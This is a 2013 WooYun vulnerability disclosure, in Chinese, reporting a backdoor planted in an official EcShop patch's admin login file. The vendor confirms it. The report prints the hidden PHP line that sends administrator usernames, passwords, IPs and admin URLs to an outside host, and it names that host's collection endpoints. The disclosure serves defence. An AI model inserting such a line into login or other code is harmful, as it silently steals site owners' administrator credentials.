当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025145

漏洞标题:EcShop官方补丁存后门(非lib_base.php那个),反向分析到黑客服务器,已证明大量电商网站中招

相关厂商:ShopEx

漏洞作者: 路人甲

提交时间:2013-06-04 19:35

修复时间:2013-09-02 19:36

公开时间:2013-09-02 19:36

漏洞类型:地下0day/成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-04: 细节已通知厂商并且等待厂商处理中
2013-06-05: 厂商已经确认,细节仅向厂商公开
2013-06-08: 细节向第三方安全合作伙伴开放
2013-07-30: 细节向核心白帽子及相关领域专家公开
2013-08-09: 细节向普通白帽子公开
2013-08-19: 细节向实习白帽子公开
2013-09-02: 细节向公众公开

简要描述:

我们的网站ecshop有点二次开发,所以每次升级补丁都要对比下修改,结果这次对比发现了个大问题,官方的补丁文件内有段后门代码,目前来看应该是截订单的人留得,黑暗啊!
反向分析了后门源码,找到了黑客的服务器,目测已经大量电商沦陷,我的妈呀!Ecshop你叫我们小站长肿么办!!
求乌云救救我们!!

详细说明:

补丁是 273utf8_patch006 ,包我幸运的保留下来了,提供给乌云管理放到网盘给厂商和安全研究人员分析。

http://pan.baidu.com/share/link?shareid=3699376066&uk=456103769


问题出在 /admin/privilege.php 中(管理员身份验证文件),登录成功设置身份认证信息前,一个file_get_content函数,怪不得会绕过之前一些大牛们的分析。

stat privilege.php 
16777218 43425476 -rw-r--r-- 1 root root 0 25952 "Jun  4 19:16:09 2013" "May  6 14:18:36 2013" "Jun  4 18:59:14 2013" "May  6 14:18:36 2013" 4096 56 0 privilege.php
@file_get_contents('http://bbs.olyouxi.com/api/manyou/ecshop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
        // 登录成功
        set_admin_session($row['user_id'], $row['user_name'], $row['action_list'], $row['last_login']);

漏洞证明:

这个代码将管理员用户名、密码、IP、时间和后台地址等信息通通的发到远程接口上,http://bbs.olyouxi.com/api/manyou/ecshop/w2.php 。
这个地址直接访问没什么,当我访问 ecshop 这个目录的时候发现居然可以目录遍历,还有一个 ok.php文件

http://bbs.olyouxi.com/api/manyou/ecshop/


1.png


在访问一下ok.php我震惊了!!

http://bbs.olyouxi.com/api/manyou/ecshop/ok.php


2.jpg


就是这个后门所记录的那些数据,居然直接在这个文件里!受害人数扔在增长

3.jpg

修复方案:

还能说啥。。。求牛人搞定黑客神马的!
求乌云救救我们!!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-06-05 09:34

厂商回复:

之前的补丁包也被同时篡改,新补丁中已全部处理。
非常感谢您为shopex信息安全做的贡献
谢谢

最新状态:

暂无